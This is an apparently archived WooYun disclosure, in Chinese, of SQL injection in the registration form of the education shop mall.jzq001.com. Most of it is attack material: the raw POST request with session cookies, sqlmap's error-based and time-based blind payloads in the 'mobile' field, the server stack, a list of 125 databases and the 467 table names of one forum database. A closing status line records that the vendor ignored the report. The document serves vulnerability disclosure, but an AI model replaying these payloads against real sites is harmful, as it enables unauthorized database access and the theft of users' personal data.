乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-06: 细节已通知厂商并且等待厂商处理中 2015-09-11: 厂商已经主动忽略漏洞,细节向公众公开
http://mall.jzq001.com/
POST /member.php?mod=zhuce HTTP/1.1Content-Length: 1186Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_WNUJNQQGMXCookie: DVDd_1c73_saltkey=kGHcH4G4; DVDd_1c73_lastvisit=1441363214; DVDd_1c73_sid=ln2lZl; DVDd_1c73_lastact=1441366829%09plugin.php%09; DVDd_1c73_IS_CITYSITE=1; DVDd_1c73_cityname=%E5%85%A8%E5%9B%BD; DVDd_1c73_cityname_en=www; DVDd_1c73_con_request_token=2298710468495038928; DVDd_1c73_con_request_token_secret=IhqcQrusQAUXJHHq; DVDd_1c73_virtualid=99d2ccc88e5cdd4df5bf6962fd0fc661; DVDd_1c73_visitedfid=254D231D235; DVDd_1c73_viewid=tid_34745; DVDd_1c73_sendmail=1; DVDd_1c73_onlineusernum=90; DVDd_1c73_connect_not_sync_t=1; DVDd_1c73__refer=%252Fhome.php%253Fac%253Dshare%2526id%253D34745%2526mod%253Dspacecp%2526type%253Dthread; recom=1; DVDd_1c73_clientinfo=false; DVDd_1c73_download=201509041896; DVDd_1c73_goods=a%3A1%3A%7Bi%3A1896%3Ba%3A7%3A%7Bs%3A6%3A%22itemid%22%3Bs%3A4%3A%221896%22%3Bs%3A5%3A%22price%22%3Bs%3A2%3A%2235%22%3Bs%3A8%3A%22vipprice%22%3Bs%3A2%3A%2225%22%3Bs%3A9%3A%22pricetype%22%3Bs%3A1%3A%220%22%3Bs%3A7%3A%22viptype%22%3Bs%3A1%3A%221%22%3Bs%3A5%3A%22thumb%22%3Bs%3A51%3A%22source%2Fplugin%2Fmall%2Fpublic%2Fupload%2Fimg%2F1422407894.jpg%22%3Bs%3A5%3A%22title%22%3Bs%3A61%3A%22%E3%80%90%E8%8B%8F%E6%95%99%E7%89%9B%E6%B4%A5%E7%89%88%E3%80%91%E4%B8%89%E5%B9%B4%E7%BA%A7%E8%8B%B1%E8%AF%AD%E4%B8%8A%E5%86%8C%E6%9C%9F%E6%9C%AB%E8%AF%95%E9%A2%98%2814%E4%BB%BD%29%22%3B%7D%7D; DVDd_1c73_shoping=b%3A0%3BHost: mall.jzq001.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regsubmit"true-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="activationauth"-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="formhash"7d375400-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="mobile"1*-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="passwordQIUXUE"g00dPa$$w0rD-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="referer"http://mall.jzq001.com/-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regsubmit"yes-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regtype"1-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="verifycode"g00dPa$$w0rD-------AcunetixBoundary_WNUJNQQGMX--
mobile是注入点125库:
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: -------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regsubmit"true-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="activationauth"-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="formhash"7d375400-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="mobile"1' AND (SELECT 1766 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1766=1766,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zvuv'='Zvuv-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="passwordQIUXUE"g00dPa$$w0rD-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="referer"http://mall.jzq001.com/-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regsubmit"yes-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regtype"1-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="verifycode"g00dPa$$w0rD-------AcunetixBoundary_WNUJNQQGMX-- Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: -------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regsubmit"true-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="activationauth"-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="formhash"7d375400-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="mobile"1' AND (SELECT * FROM (SELECT(SLEEP(5)))dFeV) AND 'syGU'='syGU-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="passwordQIUXUE"g00dPa$$w0rD-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="referer"http://mall.jzq001.com/-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regsubmit"yes-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regtype"1-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="verifycode"g00dPa$$w0rD-------AcunetixBoundary_WNUJNQQGMX-----web server operating system: Linux CentOS 6.5web application technology: PHP 5.5.22, Apache 2.2.15back-end DBMS: MySQL 5.0available databases [125]:[*] 021gaokao.com[*] 16qianjin_2013[*] 16qianjin_2013_2[*] 21edu[*] 21edu1[*] 21edu2[*] 21eedu[*] 51qiuxue[*] 52eedu[*] 52qiuxue[*] backup[*] bbs_52qiuxue[*] bbs_52qiuxue20150805[*] bbs_52qiuxue_20150703[*] bbs_52qiuxue_20150804[*] bbs_52qiuxue_backup20150703[*] bfdly.com[*] bfdly.com_new[*] bfdly_com[*] ceqiuxue[*] dedecmsv57utf8sp1[*] destoon[*] efyingyu.com[*] gt.52qiuxue.com[*] hangjinxue[*] hdm0360223_db[*] htlx.iacliuxue.net_new[*] huatong.cliuxue.net[*] huatong.iacliuxue.org[*] huatongbefoundfcom[*] huatongbefoundfcombak[*] huatongbefoundfcombbak[*] ihuatong.com[*] information_schema[*] jh.ydyjiajiao.org[*] jinghan.zhilife.net[*] jinghantj.com[*] jingrui[*] jingrui1v1.com[*] jr.ydyfudao.com[*] jztjy.cn[*] luntan[*] luntantest1011[*] maisiling[*] moban_huatong[*] my021gaokao[*] my97today[*] mybtxueda[*] mycdxueda[*] mycqxueda[*] myczxueda[*] mydg-seiko[*] mydgxueda[*] mydlxueda[*] myfsxueda[*] myhhhtxueda[*] myhuizxueda[*] mymupingwang[*] myncxueda[*] mynjlvying[*] mynnxueda[*] myshjingh[*] mysql[*] mysql_log[*] mysuzxueda[*] mytyxueda[*] mywinnetcap[*] mywzxueda[*] myxmxueda[*] myxuedacs[*] myxyxueda[*] myytxueda[*] nice[*] njlvying.com[*] novel[*] phpcms[*] ppc[*] ppcall.befound.cn[*] qdxueda.cn[*] qiaowai[*] qwiacliuxuenet[*] ruisiyingyu.com[*] sq_sinobm[*] sunmax[*] sunmaxtest[*] szjuzhitang.com[*] ultrax[*] vip.befound.cn[*] vzmer00376[*] www.1v1buxi.net[*] www.1v1buxi.org/huatong[*] www.1v1buxi.org/zhongqing[*] www.aicansi.com[*] www.aicansi.com/huatong[*] www.bf1v1.org[*] www.bfdeu.com/zhongqing[*] www.bfdeu.com/zhongqing2[*] www.bliuxue.net[*] www.cpbo.cn/huatong[*] www.k12-edu.org/zhongqing[*] www.libro.cn/huatong[*] www.mupingwang.com[*] www.qzj999.com/zhongqing[*] www.sdfyme.com/huatong[*] www.tzun.cn/zhongqing[*] www.ydy114.org/huatong[*] www_51fudao_org_xxq[*] wwwchuguoyiminnet_qw[*] wwwcnadicn_qw[*] wwwedubuxnet[*] wwwedupeixcom[*] wwwedupeixcombak[*] wwwgexingfudaonetjinghan[*] wwwivcdcn_qiaowai[*] wwwpcfmcn_qiaowai[*] wwwssjzhcom_qiaowai[*] xajuzhitang.com[*] yuejiliuxue.com[*] yzm_usercenter[*] zgjhjy.zhilife.net[*] zhishenghuo.org[*] zjht.befoundg.com[*] zjht.befoundg.com.bak[*] zqsa[*] zt00p1_db
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: -------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regsubmit"true-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="activationauth"-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="formhash"7d375400-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="mobile"1' AND (SELECT 1766 FROM(SELECT COUNT(*),CONCAT(0x716a6a7071,(SELECT (ELT(1766=1766,1))),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Zvuv'='Zvuv-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="passwordQIUXUE"g00dPa$$w0rD-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="referer"http://mall.jzq001.com/-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regsubmit"yes-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regtype"1-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="verifycode"g00dPa$$w0rD-------AcunetixBoundary_WNUJNQQGMX-- Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: -------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regsubmit"true-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="activationauth"-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="formhash"7d375400-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="mobile"1' AND (SELECT * FROM (SELECT(SLEEP(5)))dFeV) AND 'syGU'='syGU-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="passwordQIUXUE"g00dPa$$w0rD-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="referer"http://mall.jzq001.com/-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regsubmit"yes-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="regtype"1-------AcunetixBoundary_WNUJNQQGMXContent-Disposition: form-data; name="verifycode"g00dPa$$w0rD-------AcunetixBoundary_WNUJNQQGMX-----web server operating system: Linux CentOS 6.5web application technology: PHP 5.5.22, Apache 2.2.15back-end DBMS: MySQL 5.0Database: bbs_52qiuxue[467 tables]+----------------------------------+| group || user || access || active_active_zh || active_changeusername || active_city_website_hooks || active_city_website_push_log || active_city_website_setting || active_lottery_chance_zh || active_lottery_line_zh || active_lottery_zh || active_questionnaire || active_questionnaire_users || active_share_qq_log || amy_user_setting || appbyme_config || appbyme_portal_module || appbyme_portal_module_source || appbyme_user_setting || article || baidusubmit_setting || baidusubmit_sitemap || baidusubmit_urlstat || class || common_admincp_cmenu || common_admincp_group || common_admincp_member || common_admincp_perm || common_admincp_session || common_admingroup || common_adminnote || common_advertisement || common_advertisement_custom || common_banned || common_block || common_block_favorite || common_block_item || common_block_item_data || common_block_permission || common_block_pic || common_block_style || common_block_xml || common_cache || common_card || common_card_log || common_card_type || common_connect_guest || common_credit_log || common_credit_log_field || common_credit_rule || common_credit_rule_log || common_credit_rule_log_field || common_cron || common_devicetoken || common_district || common_diy_data || common_domain || common_failedip || common_failedlogin || common_friendlink || common_grouppm || common_invite || common_magic || common_magiclog || common_mailcron || common_mailqueue || common_member || common_member_action_log || common_member_connect || common_member_count || common_member_crime || common_member_field_forum || common_member_field_home || common_member_forum_buylog || common_member_grouppm || common_member_log || common_member_magic || common_member_medal || common_member_newprompt || common_member_profile || common_member_profile_bak || common_member_profile_setting || common_member_security || common_member_secwhite || common_member_stat_field || common_member_status || common_member_validate || common_member_verify || common_member_verify_info || common_member_wechat || common_member_wechatmp || common_myapp || common_myinvite || common_mytask || common_nav || common_onlinetime || common_optimizer || common_patch || common_plugin || common_plugin_aliyunrec || common_plugin_luckypacket || common_plugin_luckypacketlog || common_pluginvar || common_process || common_regip || common_relatedlink || common_remote_port || common_report || common_searchindex || common_seccheck || common_secquestion || common_session || common_setting || common_setting2 || common_setting_150805 || common_setting_150807 || common_smiley || common_sphinxcounter || common_stat || common_statuser || common_style || common_stylevar || common_syscache || common_tag || common_tagitem || common_task || common_taskvar || common_template || common_template_block || common_template_permission || common_uin_black || common_usergroup || common_usergroup_field || common_verifycode || common_visit || common_word || common_word_type || connect_disktask || connect_feedlog || connect_memberbindlog || connect_postfeedlog || connect_tthreadlog || dsu_paulsign || dsu_paulsignemot || dsu_paulsignset || form || forum_access || forum_activity || forum_activityapply || forum_announcement || forum_attachment || forum_attachment_0 || forum_attachment_1 || forum_attachment_2 || forum_attachment_3 || forum_attachment_4 || forum_attachment_5 || forum_attachment_6 || forum_attachment_7 || forum_attachment_8 || forum_attachment_9 || forum_attachment_exif || forum_attachment_unused || forum_attachtype || forum_bbcode || forum_collection || forum_collectioncomment || forum_collectionfollow || forum_collectioninvite || forum_collectionrelated || forum_collectionteamworker || forum_collectionthread || forum_creditslog || forum_debate || forum_debatepost || forum_faq || forum_filter_post || forum_forum || forum_forum_threadtable || forum_forumfield || forum_forumrecommend || forum_groupcreditslog || forum_groupfield || forum_groupinvite || forum_grouplevel || forum_groupuser || forum_hotreply_member || forum_hotreply_number || forum_imagetype || forum_medal || forum_medallog || forum_memberrecommend || forum_moderator || forum_modwork || forum_newthread || forum_onlinelist || forum_order || forum_pinggu || forum_poll || forum_polloption || forum_polloption_image || forum_pollvoter || forum_post || forum_post_location || forum_post_moderate || forum_post_tableid || forum_postcache || forum_postcomment || forum_postlog || forum_poststick || forum_promotion || forum_ratelog || forum_relatedthread || forum_replycredit || forum_rsscache || forum_sofa || forum_spacecache || forum_statlog || forum_thread || forum_thread_moderate || forum_threadaddviews || forum_threadcalendar || forum_threadclass || forum_threadclosed || forum_threaddisablepos || forum_threadhidelog || forum_threadhot || forum_threadimage || forum_threadlog || forum_threadmod || forum_threadpartake || forum_threadpreview || forum_threadprofile || forum_threadprofile_group || forum_threadrush || forum_threadtype || forum_trade || forum_tradecomment || forum_tradelog || forum_typeoption || forum_typeoptionvar || forum_typevar || forum_warning || group_class || group_class_user || home_access || home_album || home_album_category || home_appcreditlog || home_blacklist || home_blog || home_blog_category || home_blog_moderate || home_blogfield || home_class || home_click || home_clickuser || home_comment || home_comment_moderate || home_docomment || home_doing || home_doing_moderate || home_favorite || home_feed || home_feed_app || home_follow || home_follow_feed || home_follow_feed_archiver || home_friend || home_friend_request || home_friendlog || home_notification || home_pic || home_pic_moderate || home_picfield || home_poke || home_pokearchive || home_share || home_share_moderate || home_show || home_specialuser || home_surrounding_user || home_userapp || home_userappfield || home_visitor || lev_login_auth_user || lev_open_auth_user || lev_open_login_user || log || mall_address || mall_advertsion || mall_advertsionswf || mall_down_15 || mall_down_data_15 || mall_favorite || mall_fields || mall_list || mall_order || mall_relation || mall_shopping || mall_withdata || mobile_setting || mobile_wechat_authcode || mobile_wechat_masssend || mobile_wechat_resource || mobile_wsq_threadlist || moodwall || myrepeats || node || node_operation || plugin_admincp_per || plugin_auction || plugin_auction_message || plugin_auction_xml || plugin_auctionapply || plugin_blessing || plugin_formmanage_formlist || portal_article_content || portal_article_count || portal_article_moderate || portal_article_related || portal_article_title || portal_article_trash || portal_attachment || portal_category || portal_category_permission || portal_comment || portal_comment_moderate || portal_rsscache || portal_topic || portal_topic_pic || resource_auth_group || resource_auth_group_user || role || role_user || role_user_copy || security_evilpost || security_eviluser || security_failedlog || sms_recv || sms_send || teacher_admin_log || teacher_area || teacher_artice || teacher_article || teacher_auditiondata || teacher_auditionlog || teacher_auth_base || teacher_auth_class || teacher_auth_courses || teacher_auth_experience || teacher_auth_index || teacher_auth_info || teacher_auth_log || teacher_auth_success_case || teacher_china || teacher_collect || teacher_comment || teacher_commission_log || teacher_consumption || teacher_course_1 || teacher_course_register || teacher_course_time_1 || teacher_course_type_1 || teacher_courses || teacher_courses_copy || teacher_customer_call_log || teacher_detail || teacher_experience || teacher_fund_log || teacher_main || teacher_member_bak || teacher_member_profile_bak || teacher_message_reminder || teacher_need || teacher_need_accept || teacher_need_copy || teacher_need_log || teacher_need_order_detaill || teacher_need_status || teacher_order || teacher_order_copy || teacher_parm || teacher_pay_log || teacher_points || teacher_proportion_rules || teacher_propotion_isopen || teacher_qrcode || teacher_qrcode_group || teacher_resources_manage || teacher_send_sms_log || teacher_sign || teacher_sign_log || teacher_student_base || teacher_student_class_feedback || teacher_student_contact || teacher_student_sign_feedback || teacher_success_case || teacher_teacher_base || teacher_teacher_comment || teacher_teacher_extend || teacher_teacher_inside_comment || teacher_tp_admin_log || teacher_tp_appointment || teacher_tp_appointment_copy || teacher_tp_area || teacher_tp_index || teacher_tp_pay_log || teacher_tp_type || teacher_tp_user_comments || teacher_tp_user_false_data || teacher_tp_user_false_parm || teacher_tp_user_feedback || teacher_umemberfields_bak || teacher_umembers_bak || teacher_user_comment || teacher_wechat_audition_send_log || teacher_wechat_send_log || teacher_wrong_log || teacher_wxvote || teacher_wxvote_people || teachers_teachers_extends || ucenter_admins || ucenter_amy_pm_heart || ucenter_applications || ucenter_badwords || ucenter_domains || ucenter_failedlogins || ucenter_feeds || ucenter_friends || ucenter_mailqueue || ucenter_memberfields || ucenter_members || ucenter_members_150813 || ucenter_members_copy || ucenter_members_copy1 || ucenter_mergemembers || ucenter_newpm || ucenter_notelist || ucenter_pm_indexes || ucenter_pm_lists || ucenter_pm_members || ucenter_pm_messages_0 || ucenter_pm_messages_1 || ucenter_pm_messages_2 || ucenter_pm_messages_3 || ucenter_pm_messages_4 || ucenter_pm_messages_5 || ucenter_pm_messages_6 || ucenter_pm_messages_7 || ucenter_pm_messages_8 || ucenter_pm_messages_9 || ucenter_protectedmembers || ucenter_settings || ucenter_sqlcache || ucenter_tags || ucenter_vars || wechat_log || weixin_binding || weixin_dy_back || weixin_dy_log || weixin_http_log || weixin_log || weixin_parm || weixin_push || weixin_qiye_log || will_log |+----------------------------------+
危害等级:无影响厂商忽略
忽略时间:2015-09-11 08:28
漏洞Rank:4 (WooYun评价)
暂无